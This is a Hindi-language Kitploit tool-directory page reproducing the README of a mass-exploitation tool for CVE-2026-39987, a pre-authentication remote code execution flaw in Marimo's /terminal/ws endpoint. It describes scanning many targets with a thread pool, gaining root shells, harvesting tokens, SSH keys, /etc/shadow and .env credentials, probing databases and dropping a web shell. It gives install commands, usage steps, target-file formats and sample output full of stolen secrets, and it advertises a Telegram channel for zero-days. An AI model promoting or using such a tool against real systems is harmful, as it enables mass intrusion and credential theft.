Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39987 — marimo एक प्रतिक्रियाशील पायथन नोटबुक है। 0.23.0 से पहले, Marimo में एक Pre-Auth RCE भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-39987
विशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubnxploited/cve-2026-39987

CVE-2026-39987

marimo एक प्रतिक्रियाशील पायथन नोटबुक है। 0.23.0 से पहले, Marimo में एक Pre-Auth RCE भेद्यता है।

रिपॉजिटरी देखें
1135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39987

marimo एक reactive Python notebook है। 0.23.0 से पहले, Marimo में Pre-Auth RCE कमजोरी मौजूद है।

   ___  _        ___     __  __  __  __      ___  __  __  _______
  / (_)(_|   |_// (_)   /  )/  \/  )/       /   \/  |/  |/  \   /
 |       |   |  \__       /|    | /| __       __/\_/|\_/|\__/  / 
 |       |   |  /   -----/ |    |/ |/  \-----   \   |   |/  \ /  
  \___/   \_/   \___/   /___\__//___\__/    \___/   |   |\__//   

CVE-2026-39987

Marimo /terminal/ws — बिना प्रमाणीकरण वाला WebSocket Pre-Auth RCE

मास स्कैनर · पूर्ण एन्यूमरेशन · स्मार्ट डिटेक्शन


Python CVE Severity Type Platform License


लेखक: Nxploited  ·  टेलीग्राम: @KNxploited


📢 नवीनतम मुफ्त zero-days और exploits के लिए टेलीग्राम चैनल जॉइन करें:

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


📖 अवलोकन

CVE-2026-39987 एक गंभीर Pre-Authentication Remote Code Execution कमजोरी है जो Marimo, एक ओपन-सोर्स reactive Python notebook प्लेटफ़ॉर्म को प्रभावित करती है।

टर्मिनल WebSocket एंडपॉइंट /terminal/ws में authentication सत्यापन का पूरी तरह अभाव है, जिससे कोई भी unauthenticated remote attacker full PTY shell प्राप्त कर सकता है और चल रहे प्रोसेस के विशेषाधिकारों के साथ मनमाने सिस्टम कमांड निष्पादित कर सकता है — अक्सर containerized deployments में root।

अन्य WebSocket एंडपॉइंट्स जैसे /ws के विपरीत, जो कनेक्शन स्वीकार करने से पहले validate_auth() को सही ढंग से लागू करते हैं, /terminal/ws एंडपॉइंट केवल रनिंग मोड और प्लेटफ़ॉर्म संगतता की जाँच करता है — authentication को पूरी तरह छोड़ देता है।

✅ पैच किया गया: marimo >= 0.23.0 ❌ 0.23.0 से पहले के सभी संस्करण कमजोर हैं


🔍 कमजोरी का विवरण

गुणमान
CVE IDCVE-2026-39987
प्रभावित सॉफ़्टवेयरmarimo < 0.23.0
कमजोरी का प्रकारPre-Auth RCE via Unauthenticated WebSocket
प्रभावित एंडपॉइंट/terminal/ws
अटैक वेक्टरनेटवर्क
Authentication आवश्यक❌ कोई नहीं
उपयोगकर्ता इंटरैक्शन❌ कोई नहीं
गंभीरता🔴 गंभीर (Critical)
प्रभावपूर्ण PTY shell · मनमाना कमांड निष्पादन
पैच किया गया संस्करणmarimo 0.23.0

🧩 मूल कारण

/ws          →  calls validate_auth()  ✅  Authentication enforced
/terminal/ws →  skips validate_auth()  ❌  No authentication

/terminal/ws हैंडलर केवल यह जाँचता है:

  1. क्या सर्वर सही मोड में चल रहा है
  2. क्या प्लेटफ़ॉर्म टर्मिनल इम्यूलेशन का समर्थन करता है

यह सेशन टोकन, कुकीज़ या किसी भी प्रकार की पहचान को कभी सत्यापित नहीं करता — जिससे हर खुला (exposed) Marimo इंस्टेंस सीधे shell में बदल जाता है।


✨ विशेषताएँ

  • 🔥 मास स्कैनर — कॉन्फ़िगर करने योग्य थ्रेड पूल के साथ हजारों टार्गेट्स को एक साथ स्कैन करें
  • 🧠 स्मार्ट एनवायरनमेंट डिटेक्शन — स्वतः पहचान: Marimo · cPanel/WHM · Plesk · Apache · Nginx · Docker · Node.js · Python ऐप्स
  • 🐚 फुल PTY शेल एक्सेस — पूर्ण टर्मिनल इम्यूलेशन के साथ बिना प्रमाणीकरण वाला WebSocket शेल
  • 📓 नोटबुक एन्यूमरेशन — सभी .py Marimo नोटबुक्स को पुनरावर्ती (recursively) खोजता और पढ़ता है
  • 🔑 टोकन हार्वेस्टिंग — CLI आर्ग्युमेंट्स, ENV वेरिएबल्स और लॉग फ़ाइलों से Marimo टोकन निकालता है
  • 🗄️ डेटाबेस डिस्कवरी — MySQL · PostgreSQL · Redis · SQLite · DuckDB की स्वतः जाँच करता है
  • 🔐 क्रेडेंशियल निष्कर्षण — .env फ़ाइलें · wp-config.php · SSH प्राइवेट कुंजियाँ · /etc/shadow
  • 📂 वेब शेल सत्यापन (Nx Drop) — वेबरूट में proof-of-concept फ़ाइल लिखता है और HTTP से सत्यापित करता है
  • 📊 संरचित प्रति-टार्गेट आउटपुट — हर टार्गेट को अपनी व्यवस्थित आउटपुट निर्देशिका मिलती है
  • 🎨 रिच टर्मिनल UI — पैनल, प्रोग्रेस ट्रैकिंग और लाइव आँकड़ों के साथ पेशेवर रंग-कोडित इंटरफ़ेस

⚙️ आवश्यकताएँ

Python 3.10 or higher

निर्भरताएँ इंस्टॉल करें:

pip install websockets rich requests urllib3

या requirements फ़ाइल का उपयोग करके:

pip install -r requirements.txt

requirements.txt

websockets
rich
requests
urllib3

🚀 उपयोग

चरण 1 — अपनी टार्गेट्स फ़ाइल तैयार करें

targets.txt नामक एक फ़ाइल बनाएँ, जिसमें प्रत्येक पंक्ति में एक टार्गेट हो। यह टूल सभी प्रारूप स्वीकार करता है:

192.168.1.100
192.168.1.101:2718
10.10.10.50:2718
https://notebook.example.com
wss://secure.notebook.io
marimo.target.local:2718

समर्थित प्रारूप: केवल IP · IP:port · डोमेन · डोमेन:port · http:// · https:// · ws:// · wss://


चरण 2 — स्कैनर लॉन्च करें

python3 CVE-2026-39987.py

चरण 3 — इंटरैक्टिव कॉन्फ़िगरेशन

  ▸ Targets file  (default: targets.txt) : targets.txt
  ▸ Threads       (default: 50)          : 100

थ्रेड रेंज: 1–300। अनुशंसित: 50–150, आपके नेटवर्क के आधार पर।


🖥️ आउटपुट पूर्वावलोकन

टर्मिनल UI

  ╭──────────────────────────────────────────────────────────╮
  │ CVE-2026-39987  ·  Marimo WebSocket RCE                  │
  │ MASS SCANNER  ·  FULL ENUM  ·  SMART DETECT              │
  │ By: Nxploited  ·  github.com/Nxploited  ·  @KNxploited   │
  ╰──────────────────────────────────────────────────────────╯

  ══════════════ ws://192.168.1.100:2718/terminal/ws ══════════

  ╭────────────────────────────────────────╮
  │  ◈◈◈  ROOT ACCESS  ◈◈◈                │
  │  ws://192.168.1.100:2718               │
  │  uid ▸  uid=0(root)  groups=[root]     │
  ╰────────────────────────────────────────╯

  ──  ENVIRONMENT  ──────────────────────────────────────────
    ✦  Type                  MARIMO
    ◈  Docker                True
    ◈  Marimo version        0.22.1
    ◈  Notebook directory    /app/notebooks

  ──  MARIMO — NOTEBOOKS  ───────────────────────────────────
    ✦  Notebooks             7 found
       ·                     /app/notebooks/analysis.py
       ·                     /app/notebooks/data_pipeline.py
       ·                     /app/notebooks/etl_job.py

  ──  MARIMO — TOKENS  ──────────────────────────────────────
    ✦  Token CLI             secret-token-abc123xyz
    ✦  .marimo.toml          /root/.marimo.toml

  ──  /etc  SENSITIVE  ──────────────────────────────────────
    ✦  /etc/shadow           READABLE  [42 entries]
    ◈  /etc/passwd           [42 lines]
    ◈  /etc/crontab          [12 lines]

  ──  SSH KEYS  ─────────────────────────────────────────────
    ✦  /root/.ssh/id_rsa     FOUND
    ✦  /root/.ssh/id_ed25519 FOUND

  ──  DATABASES  ────────────────────────────────────────────
    ✦  MySQL                 DATABASES LISTED
    ✦  Redis                 PONG — NO AUTH
    ✦  DuckDB files          /app/notebooks/data.duckdb

  ──  SENSITIVE ENV VARS  ───────────────────────────────────
    ✦  DATABASE_URL          postgresql://admin:p4ss@db:5432/prod
    ✦  AWS_SECRET_ACCESS_KEY redacted...

  ──  NX FILE DROP  ──────────────────────────────��──────────
    ✦  Shell write           /app/notebooks/Nx.py
    ✦  HTTP access           http://192.168.1.100:2718/Nx.py

  ──  COMPLETE  ─────────────────────────────────────────────
    ◈  Saved to              nx_output/192.168.1.100_2718/

  ◦ 73/200  ROOT:5  PRIV:11  SHELL:18  FAIL:39  6.3/s

लाइव प्रोग्रेस

  ◦ 73/200  ROOT:5  PRIV:11  SHELL:18  FAIL:39  6.3/s

📁 आउटपुट संरचना

टूल डाउनलोड करें